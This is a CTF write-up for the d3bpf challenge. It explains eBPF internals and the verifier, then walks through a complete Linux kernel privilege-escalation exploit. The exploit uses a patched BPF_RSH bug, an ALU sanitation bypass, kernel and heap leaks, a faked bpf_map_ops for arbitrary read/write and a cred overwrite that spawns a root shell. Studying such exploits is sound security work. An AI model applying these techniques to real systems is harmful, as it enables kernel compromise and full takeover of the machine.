This post is about eBPF exploitation, using a CTF challenge from D^3CTF named d3bpf. I learnt so much while working on this challenge that I want to document all those findings and understandings as a future reference. All snippets are from the v5.11 kernel, as the challenge uses this version. Let's dig right in.

(e)BPF

What is eBPF?

eBPF stands for extended Berkeley Packet Filter. Originally, BPF was intended for, as the name suggests, packet filtering. Because of its usefulness, it was later extended into eBPF. It provides a small instruction set for implementing various kinds of kernel programs, which can be loaded into any supporting kernel version. Example programs are kprobes and packet filters. The provided code is added to the kernel and runs in the kernel's context. This very feature made it a prime target for vulnerability researchers.
Initially, a few types of eBPF programs could even be loaded by unprivileged users.

eBPF programs

eBPF code is given to the kernel in the form of an eBPF program. Each type of eBPF program has its own capabilities and features. One example is BPF_PROG_TYPE_SOCKET_FILTER. This type of program is used for packet filtering and is attached to a particular socket owned by the user. Whenever the socket receives a packet, the eBPF program is executed to perform the filtering.
eBPF programs undergo checking by a kernel mechanism called the eBPF verifier. The verifier checks the program for potentially illegal or dangerous functionality. Only if the program makes it past the verifier is it loaded into the kernel. eBPF programs also have a 512-byte stack.

eBPF Maps

The main mechanism for interacting with eBPF programs is eBPF maps. Maps are created by the user and are key-value stores. There are two main types of maps: arrays and hash tables.
In the case of an array map, the key is the index and the value is the bytes stored at that index. While creating a map, the user provides the key size, value size and number of entries. The key size cannot be greater than 4 bytes, but the value size and number of entries can be arbitrary. Creating a map allocates a buffer in the kernel. Each map type has a set of operations defined on it.

eBPF instruction set

Covering the full eBPF instruction set is out of scope for this article; I will only explain a few things. You can read about the eBPF instructions in detail here. eBPF provides ten registers, BPF_REG_{0..10}. BPF_REG_{1..5} are used for calling functions (more on this later). The return value is stored in BPF_REG_0, and BPF_REG_10 is the frame pointer for the eBPF stack. When an eBPF program is run, BPF_REG_1 contains a pointer to the eBPF context, which holds some information about the program.
In eBPF terminology, immediate values are scalars, and pointers are any values derived from pointers. You can only obtain certain types of pointers in eBPF, either through eBPF-defined routines or from registers that already contain pointers (BPF_REG_1 is PTR_TO_CTX (context) and BPF_REG_10 is PTR_TO_STACK (fp)); e.g. CONST_PTR_TO_MAP can be obtained with the BPF_LD_MAP_FD instruction and PTR_TO_MAP_VALUE_OR_NULL with the bpf_map_lookup_elem function. You cannot treat an arbitrary value as a pointer, since that is inherently dangerous in the kernel context in which eBPF programs execute. By default, all user-defined values (values in maps, values on the stack etc.) are considered scalars (immediates) and can only become pointers through (allowed) pointer arithmetic with the previously mentioned pointers. Lastly, arithmetic between two pointers results in a scalar.
To put a scalar into (say) BPF_REG_1:

BPF_MOV64_IMM(BPF_REG_1, 1337)

Almost every instruction has a 32-bit and a 64-bit variant, and almost every instruction has a version taking a register or an immediate operand. For example, to put a 32-bit scalar into BPF_REG_1 and then move BPF_REG_1 to BPF_REG_2:

BPF_MOV32_IMM(BPF_REG_1, 1337)
BPF_MOV64_REG(BPF_REG_2, BPF_REG_1)

You can perform arithmetic on registers using the ALU{32,64} instructions with the following syntax:

BPF_ALU{32,64}_{IMM,REG}(OP, BPF_REG_DEST, BPF_REG|IMM)
e.g. BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1337)

You can perform addition, subtraction, multiplication, division, and bit shifting on scalars.
For pointers, only addition and subtraction are allowed.
Every eBPF program should end in an exit instruction:

BPF_EXIT_INSN()

For loading and storing values from memory through pointers, you can use the following instructions:

BPF_LDX_MEM(SIZE, BPF_REG_DEST, BPF_REG_SRC, OFFSET)
BPF_STX_MEM(SIZE, BPF_REG_DEST, BPF_REG_SRC, OFFSET)

e.g.
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0) -> BPF_REG_1 = *(u64 *)(BPF_REG_2 + 0)
BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0) -> *(u64 *)(BPF_REG_1 + 0) = BPF_REG_2

eBPF also provides conditional jumps. The last operand is the number of instructions to skip when the condition holds; the snippet below skips the exit instruction when BPF_REG_1 != 0:

BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1)
BPF_EXIT_INSN()

eBPF provides a few helper functions which can be called from eBPF programs; we will only be using map functions here. For map functions (BPF_FUNC_map_{name}), BPF_REG_{1..5} contain the arguments (BPF_REG_6 is conventionally kept pointing to the context, since instructions like BPF_LD_ABS require it there). After a call, BPF_REG_{1..5} hold no values (they are marked unknown) because they are caller-saved registers; the other registers are callee-saved. All map functions require the map pointer to be in BPF_REG_1. Here is an example call:

// key = 0 on the stack
BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0),
// arg2 (BPF_REG_2): pointer to the key
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10)
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4)
// arg1 (BPF_REG_1): the map pointer
BPF_LD_MAP_FD(BPF_REG_1, <map fd>)
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem)

If your program is of type BPF_PROG_TYPE_SOCKET_FILTER, you can use the following instruction to load values from the sk_buff buffer:

BPF_LD_ABS(SIZE, OFF)

Note that this will also clear the caller-saved registers.
I think this is enough.

For example programs, look at this link.

eBPF verifier

The eBPF verifier is the most important component in eBPF, as it ensures that no dangerous program gets executed. In a nutshell, the verifier (bpf_check) visits each instruction and performs checks specific to that instruction and the context it runs in. For example, if we're performing pointer arithmetic, it needs to make sure we don't break out of the allowed area.
For this purpose, it keeps track of every register's state based on previous operations and updates those states after visiting each instruction. The register state is stored in a struct named bpf_reg_state, which tracks min and max values, both signed and unsigned.
The verifier blocks uninitialised memory/register access, oob pointer arithmetic, storing pointers in maps, returning pointers, invalid arguments for function calls, etc.
In this sense, the eBPF verifier is kind of like the typer in Chrome/Chromium: it keeps track of everything and speculates based on the information it has. And like the typer, it has bugs which can be used to mislead it into making wrong assumptions about the program. But, also like the typer, it adds runtime checks for the speculations it makes.

ALU Sanitation

ALU Sanitation is the part of the verifier which enforces the verifier's speculations at runtime. If the program is loaded by root, there is no ALU Sanitation, since root can already read kernel pointers via kallsyms. ALU Sanitation applies to pointers: before each addition or subtraction on a pointer, the following instructions are added:

BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1); // -1 in old kernel versions
BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);

Here BPF_REG_AX is an auxiliary register used by eBPF, off_reg is the register holding the offset to be added to/subtracted from the pointer, and alu_limit is the maximum value allowed for that operation. This instruction sequence ensures that no value greater than alu_limit - 1 gets added to/subtracted from the pointer (out-of-range offsets are replaced with 0). alu_limit is calculated from the verifier's information about that register.
But if the information the verifier has is wrong, then alu_limit is wrong, and the whole mechanism can be bypassed.
Let's take an example. Suppose a pointer is at 0x1000 and is allowed to go up to 0x2500. Using some vulnerability, we make the verifier think the pointer is still at 0x1000 while it is actually at 0x0. In this case, the alu_limit for subtraction and addition will be 0x1000 and 0x1500 respectively, so we can access 0x1000 bytes of data before the pointer (OOB read/write). This problem is highlighted here.
But what if alu_limit == 0? Then alu_limit - 1 wraps around to 0xffffffff, so ALU Sanitation enforces a limit of 0xffffffff and we can add or subtract any 32-bit value.
This bug was fixed in newer kernel versions.

eBPF Execution

If the program makes it past the verifier, then (based on the kernel config) it is either interpreted at runtime or JITed to machine code.

d3bpf

The challenge files are available here.

Patch analysis

The challenge applies a patch to the verifier's handling of BPF_RSH (bitwise right shift).

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 37581919e..8e98d4af5 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -6455,11 +6455,11 @@ static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
             scalar_min_max_lsh(dst_reg, &src_reg);
         break;
     case BPF_RSH:
-        if (umax_val >= insn_bitness) {
-            /* Shifts greater than 31 or 63 are undefined.
-             * This includes shifts by a negative number.
-             */
-            mark_reg_unknown(env, regs, insn->dst_reg);
+        if (umin_val >= insn_bitness) {
+            if (alu32)
+                __mark_reg32_known(dst_reg, 0);
+            else
+                __mark_reg_known_zero(dst_reg);
             break;
         }
         if (alu32)

The adjust_scalar_min_max_vals function is called whenever an instruction is visited, to update the verifier's state information about the scalar registers involved.
To break the patch down: if the unsigned minimum value (umin_val) of the shift amount is greater than or equal to the instruction bit size (insn_bitness, 32 or 64), the destination register is marked as known to contain 0. In simple terms, the patch assumes that a 64-bit value right-shifted by 64 or more contains 0, and likewise for 32-bit values.
Intuitively, it seems right that a value right-shifted by at least its bit width should be zero. Then why did the original code say that shifts greater than 31/63 are undefined?
Let's verify the new code. The Intel instruction manual says shifts are implemented by first masking the shift count; in 64-bit mode the mask is 0x3f. So shr rax, 64 is executed as shr rax, 64 & 0x3f, and 64 & 0x3f is 0. No shifting is done, and the original value remains unchanged. But the verifier assumes the result is zero, while the actual value can be anything.
The given kernel is compiled with CONFIG_BPF_JIT_ALWAYS_ON and will always compile the eBPF program to machine code.

Triggering vuln

My first attempt was the following:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <syscall.h>
#include <linux/bpf.h>
#include <sys/socket.h>
#include "bpf_insn.h"

int socks[2] = {-1};

int bpf(int cmd, union bpf_attr *attr){
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

int bpf_prog_load(union bpf_attr *attr){
    return bpf(BPF_PROG_LOAD, attr);
}

union bpf_attr* create_bpf_prog(struct bpf_insn *insns, unsigned int insn_cnt){
    // zero the attr: the kernel rejects garbage in unused fields
    union bpf_attr *attr = (union bpf_attr *) calloc(1, sizeof(union bpf_attr));

    attr->prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
    attr->insn_cnt = insn_cnt;
    attr->insns = (uint64_t) insns;
    attr->license = (uint64_t)"";

    return attr;
}

void attach_socket(int prog_fd){
    if(socks[0] == -1 && socketpair(AF_UNIX, SOCK_DGRAM, 0, socks) < 0){
        perror("socketpair");
        exit(1);
    }
    
    if(setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0){
        perror("setsockopt");
        exit(1);
    }
}

void setup_bpf_prog(struct bpf_insn *insns, uint insncnt){
    char log_buffer[0x4000] = {0};

    union bpf_attr *prog = create_bpf_prog(insns, insncnt);

    prog->log_level = 2;
    prog->log_buf = (uint64_t) log_buffer;
    prog->log_size = sizeof(log_buffer);
    strncpy(prog->prog_name, "stdnoerr", 16);

    int prog_fd = bpf_prog_load(prog);
    printf("%zu\n", strlen(log_buffer));
    puts(log_buffer);

    if(prog_fd < 0){
        perror("prog_load");
        exit(1);
    }

    attach_socket(prog_fd);
}

void run_bpf_prog(struct bpf_insn *insns, uint insncnt){
    int val = 0;

    setup_bpf_prog(insns, insncnt);
    write(socks[1], &val, sizeof(val));
}

int main(){
    struct bpf_insn insns[] = {
        BPF_MOV64_IMM(BPF_REG_0, 0x1337),
        BPF_ALU64_IMM(BPF_RSH, BPF_REG_0, 64),
        BPF_EXIT_INSN()
    };

    run_bpf_prog(insns, sizeof(insns)/sizeof(insns[0]));
}

I set a breakpoint at *sk_filter_trim_cap + 140 to see the code in action, but the program load failed with the following log buffer output:

func#0 @0
0: R1=ctx(id=0,off=0,imm=0) R10=fp0
0: (b7) r0 = 4919
1: R0_w=invP4919 R1=ctx(id=0,off=0,imm=0) R10=fp0
1: (77) r0 >>= 64
invalid shift 64
processed 2 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0

This error comes from this line: the verifier already has a check for invalid shifts, but only for immediate shift amounts.
If we put 64 in another register and shift by that register, we trigger the vuln.

BPF_MOV64_IMM(BPF_REG_0, 0x1337),
BPF_MOV64_IMM(BPF_REG_1, 64),
BPF_ALU64_REG(BPF_RSH, BPF_REG_0, BPF_REG_1),
BPF_EXIT_INSN()

And voila! We triggered the vuln.

Getting a leak

Now that we have a value the verifier thinks is 0, we can use it in pointer arithmetic to access out-of-bounds memory. Accessing a map's memory out of bounds can be used to get a kernel leak. eBPF maps use the following struct:

struct bpf_map {
	const struct bpf_map_ops *ops ____cacheline_aligned;
	struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
	void *security;
#endif
	enum bpf_map_type map_type;
	u32 key_size;
	u32 value_size;
	u32 max_entries;
	u32 map_flags;
	int spin_lock_off; /* >=0 valid offset, <0 error */
	u32 id;
	int numa_node;
	u32 btf_key_type_id;
	u32 btf_value_type_id;
	struct btf *btf;
#ifdef CONFIG_MEMCG_KMEM
	struct mem_cgroup *memcg;
#endif
	char name[BPF_OBJ_NAME_LEN];
	u32 btf_vmlinux_value_type_id;
	bool bypass_spec_v1;
	bool frozen; /* write-once; write-protected by freeze_mutex */
	atomic64_t refcnt ____cacheline_aligned;
	atomic64_t usercnt;
	struct work_struct work;
	struct mutex freeze_mutex;
	u64 writecnt; /* writable mmap cnt; protected by freeze_mutex */

    // map specific data
};

We will be using only Array maps (BPF_MAP_TYPE_ARRAY) in the exploit. Its struct is as follows:

struct bpf_array {
	struct bpf_map map;
	u32 elem_size;
	u32 index_mask;
	struct bpf_array_aux *aux;
	union {
		char value[0] __aligned(8);
		void *ptrs[0] __aligned(8);
		void __percpu *pptrs[0] __aligned(8);
	};
};

ops contains a kernel pointer, since the allowed functions for a given map type are declared at compile time.
For an array map, ops points to array_map_ops. We can use that to calculate the kernel base.
We will use a map with a key size of 4, a value size of 0x150 and max_entries of 1.

oob_map_fd = bpf_map_create(4, 0x150, 1);

We will use BPF_FUNC_map_lookup_elem to get a pointer to the value corresponding to the key (basically a pointer to the start of the user-controlled data).

// load map_ptr_or_null in BPF_REG_0
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
// returns map_ptr + 0x110 (offset of .values in bpf_array)

// convert map_ptr_or_null -> map_ptr to perform further operations
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

Now we use the verifier's wrong assumption about the register it thinks holds 0 (say BPF_REG_0) to perform pointer subtraction and move the pointer back to the start of the bpf_array struct, so we can read the ops pointer. To do that, we also need to bypass ALU Sanitation.
Lucky for us, there's an easy bypass here. Remember the alu_limit = 0 issue?
We will use it. Currently, the pointer returned by map_lookup_elem (say data_ptr, in BPF_REG_7) equals map_ptr + 0x110. We move 0x110 into BPF_REG_0 and trigger the vuln so the verifier thinks it is 0, then subtract BPF_REG_0 from data_ptr to make it map_ptr + 0x0. The alu_limit calculated for this subtraction is 0, and alu_limit - 1 wraps to 0xffffffff, which lets us subtract 0x110 gracefully.

// trigger vuln and make eBPF think we are still map_ptr + 0x110
// but in reality we're map_ptr + 0x0
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),
// ALU Sanitation will set alu_limit = 0 but alu_limit - 1 will be used
// hence any 32-bit value can be used
BPF_MOV64_IMM(BPF_REG_0, 0x110),
BPF_MOV64_IMM(BPF_REG_1, 64),
BPF_ALU64_REG(BPF_RSH, BPF_REG_0, BPF_REG_1), // the bug
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_0), // map_ptr + 0x110 -> map_ptr + 0x0

Now we read ops and write it to map_ptr + 0x110 so we can read it from userspace.

// load the ptr (kbase leak)
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),
// make map_ptr + 0x0 to map_ptr + 0x110
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x110), 
// write array_map_ops ptr to maps_ptr + 0x110
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
BPF_EXIT_INSN(),

And we get the kbase:

array_map_ops: 0xffffffff820363a0
kbase: 0xffffffff81000000

When I stepped through the program using gdb, I saw something interesting in the map data:

gef➤  x/26gx 0xffff888004e23400   <-- map_ptr
0xffff888004e23400:     0xffffffff820363a0      0x0000000000000000
0xffff888004e23410:     0x0000000000000000      0x0000000400000002
0xffff888004e23420:     0x0000000100000150      0xffffffea00000000
0xffff888004e23430:     0xffffffff00000001      0x0000000000000000
0xffff888004e23440:     0x0000000000000000      0xffff88800392b000
0xffff888004e23450:     0x0000000000000000      0x0000000000000000
0xffff888004e23460:     0x0000000000000000      0x0000000000000000
0xffff888004e23470:     0x0000000000000000      0x0000000000000000
0xffff888004e23480:     0x0000000000000002      0x0000000000000001
0xffff888004e23490:     0x0000000000000000      0x0000000000000000
0xffff888004e234a0:     0x0000000000000000      0x0000000000000000
0xffff888004e234b0:     0x0000000000000000      0x0000000000000000
0xffff888004e234c0:     0xffff888004e234c0      0xffff888004e234c0 <-- a self-pointer

This is because of bpf_map’s member work (type work_struct). It contains a doubly-linked list (to keep track of bpf maps?). We can use it to leak map_ptr.

// map_ptr + 0x0 -> map_ptr + 0xc0
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0xc0),
// load the ptr (heap leak)
BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_7, 0),
// make map_ptr + 0xc0 to map_ptr + 0x110
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x50),
// write *(map_ptr + 0xc0) to maps_ptr + 0x118
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_9, 8),

array_map_ops: 0xffffffff820363a0
kbase: 0xffffffff81000000
map_ptr: 0xffff888004e1a800

Here’s the main function so far:

int oob_map_fd = bpf_map_create(4, 0x150, 1);

struct bpf_insn kleak_prog[] = {
    // load map_ptr_or_null in BPF_REG_0
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
    BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
    BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd),
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
    BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
    // returns map_ptr + 0x110 (offset of .values in array_map)

    // map_ptr_or_null -> map_ptr
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // trigger vuln and make eBPF think we are still map_ptr + 0x110
    // but in reality we're map_ptr + 0x0
    BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),
    // ALU Sanitation will set alu_limit = 0 but alu_limit - 1 will be used
    // hence any 32-bit value can be used
    BPF_MOV64_IMM(BPF_REG_0, 0x110),
    BPF_MOV64_IMM(BPF_REG_1, 64),
    BPF_ALU64_REG(BPF_RSH, BPF_REG_0, BPF_REG_1), // the bug
    BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_0),
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), // load the ptr (kbase leak)
    
    // map_ptr + 0x0 -> map_ptr + 0xc0
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0xc0),
    BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_7, 0), // load the ptr (heap leak)

    // write the read ptr to map for reading it from userspace
    // make map_ptr + 0xc0 to map_ptr + 0x110
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x50), 
    // write array_map_ops ptr to maps_ptr + 0x110
    BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
    // write map_ptr + 0xc0 to maps_ptr + 0x118
    BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_9, 8),
    BPF_EXIT_INSN(),
};

run_bpf_prog(kleak_prog, sizeof(kleak_prog)/sizeof(kleak_prog[0]));

uint64_t array_map_ops = bpf_map_lookup_elem(oob_map_fd, 0, 0);
uint64_t map_ptr = bpf_map_lookup_elem(oob_map_fd, 0, 1) - 0xc0;
uint64_t kbase = array_map_ops - ARRAY_MAP_OPS_OFFSET;

printf("array_map_ops: 0x%lx\nkbase: 0x%lx\nmap_ptr: 0x%lx\n", array_map_ops, kbase, map_ptr);

Arbitrary Read & Write

I found two methods for achieving this.
One by Manfred Paul (@_manfp), described here.
One by R (@n0psledbyte), showcased here.

Manfred's method works across multiple kernels and allows multiple reads and writes without loading new bpf programs each time, but needs two different programs, one for read and one for write.
R, on the other hand, uses just a single program to overwrite modprobe_path.

I wanted to make a single program which allows multiple reads/writes from userspace, and here I present a method to do so. This method is NOT like Manfred's, which can easily be used across multiple kernels; it relies on some offsets. But it sums up my knowledge of eBPF for now.

To understand this method, we need to know a few things. Let's start.
First off, since JIT is enabled in this kernel, the eBPF program will be jitted. When an eBPF program is jitted, the map helper calls it makes are converted into direct calls to the corresponding functions. This means the jitted program will NOT consult ops at runtime to find the right function; the function's address is embedded in the code (according to ops at JIT time). If the program were interpreted instead, it would always retrieve the pointer from ops. map_lookup_elem is a special case: instead of embedding the function's address in the code, a map operation named map_gen_lookup is used to generate equivalent eBPF instructions, which become part of the eBPF program (like the ALU Sanitation checks).
Each map type has its own map_gen_lookup. R found that lookup functions for map type BPF_MAP_TYPE_ARRAY_OF_MAPS are a bit unique and useful for exploitation. Here’s the function:

static void *array_of_map_lookup_elem(struct bpf_map *map, void *key)
{
	struct bpf_map **inner_map = array_map_lookup_elem(map, key);

	if (!inner_map)
		return NULL;

	return READ_ONCE(*inner_map);
}

It dereferences the value returned by the plain array_map_lookup_elem, which returns a pointer to the value.
You might be asking, “What is your plan exactly?”
My plan is to overwrite a map's ops pointer with a user-controlled value, faking a bpf_map_ops whose map_gen_lookup is array_of_map_gen_lookup. A program that then uses this map gets the dereference inlined, and we can use that to read/write arbitrary kernel values.
The eBPF verifier thinks map_lookup_elem returns a pointer to a map value, but this makes the pointer user-controlled (since the user controls the map's data and the generated code dereferences it). The verifier will let us read/write through it, since it thinks we are accessing map values.
The eBPF verifier uses bpf_func_proto for checks on function calls.

Overwrite Ops

We will overwrite the ops of arb_read_write_map. But first we need a fake bpf_map_ops; we will use oob_map's value area for this. We only need to write map_update_elem, map_lookup_elem and map_gen_lookup.

BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd),
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

// setup fake bpf_map_ops struct with only needed values
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // move map_ptr + 0x110
BPF_MOV64_IMM(BPF_REG_0, kbase + ARRAY_MAP_UPDATE_ELEM_OFFSET),
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 12 * 8),

BPF_MOV64_IMM(BPF_REG_0, kbase + ARRAY_MAP_LOOKUP_ELEM_OFFSET),
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 11 * 8),

BPF_MOV64_IMM(BPF_REG_0, kbase + 0x20e9c0), // array_of_map_gen_lookup
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 19 * 8),

Now we overwrite the ops of arb_read_write_map. As in the previous program, we use map_lookup_elem and the vuln to make data_ptr point to map_ptr + 0x0 instead of map_ptr + 0x110, then write oob_map_ptr + 0x110 into ops.

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_LD_MAP_FD(BPF_REG_1, arb_read_write_map_fd),
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem), // get values ptr

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),

// trigger vuln
BPF_MOV64_IMM(BPF_REG_0, 0x110),
BPF_MOV64_IMM(BPF_REG_1, 64),
BPF_ALU64_REG(BPF_RSH, BPF_REG_0, BPF_REG_1),
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_0),

// special instruction to load 64-bit immediates
BPF_LD_IMM64(BPF_REG_0, map_ptr + 0x110), // oob_map_ptr + 0x110

// overwrite ops with oob_map_ptr + 0x110
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),

BPF_EXIT_INSN(),

Arbitrary Read & Write program

Now we make a program which uses map_lookup_elem on arb_read_write_map, triggering array_of_map_gen_lookup during jitting.

BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_LD_MAP_FD(BPF_REG_1, arb_read_write_map_fd),
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem), // will use array_of_map_gen_lookup

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),

We will use a third map, info_map, for the communication part. We tell the program whether to read or write via the socket. A read value is written to info_map, and the value to write is taken from info_map as well.

BPF_LD_ABS(BPF_B, 0), // loads the first byte of the packet
BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // decide byte for arb_read or arb_write

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_LD_MAP_FD(BPF_REG_1, info_map_fd),
BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),

BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),

BPF_JMP_IMM(BPF_JEQ, BPF_REG_9, 1, 4), // 0 for read, 1 for write

BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), // arb_read
BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_7, 0),

BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),

BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // arb_write
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),

BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),

I wrote two helper functions, one for each operation:

uint64_t arb_read(uint64_t addr){
    int req = 0;

    bpf_map_update_elem(arb_read_write_map_fd, 0, &addr, BPF_ANY);

    write(socks[1], &req, sizeof(req));

    return bpf_map_lookup_elem(info_map_fd, 0, 0);
}

int arb_write(uint64_t addr, uint64_t val){
    int req = 1;

    bpf_map_update_elem(arb_read_write_map_fd, 0, &addr, BPF_ANY);
    bpf_map_update_elem(info_map_fd, 0, &val, BPF_ANY);

    write(socks[1], &req, sizeof(req));

    // check if the value is written or not
    // used for debugging
    return bpf_map_lookup_elem(info_map_fd, 0, 0) == val;
}

And with that, I achieved what I wanted. (sigh)
Now, to complete the challenge, I overwrote current->cred with init_cred.

uint64_t current_task_struct = arb_read(arb_read(__per_cpu_offset) + current_task);
uint64_t init_cred = kbase + INIT_CRED_OFFSET;

arb_write(current_task_struct + CRED_OFFSET, init_cred);

system("/bin/sh");

If you want to exit gracefully, you need to restore the overwritten ops to its original value.

My final exploit is available here.

Finally, I want to thank Manfred Paul, R and @chompie1337 for the amazing content about the subject.
If you wanna talk, hit me up on discord stdnoerr#7880 or twitter @stdnoerr.
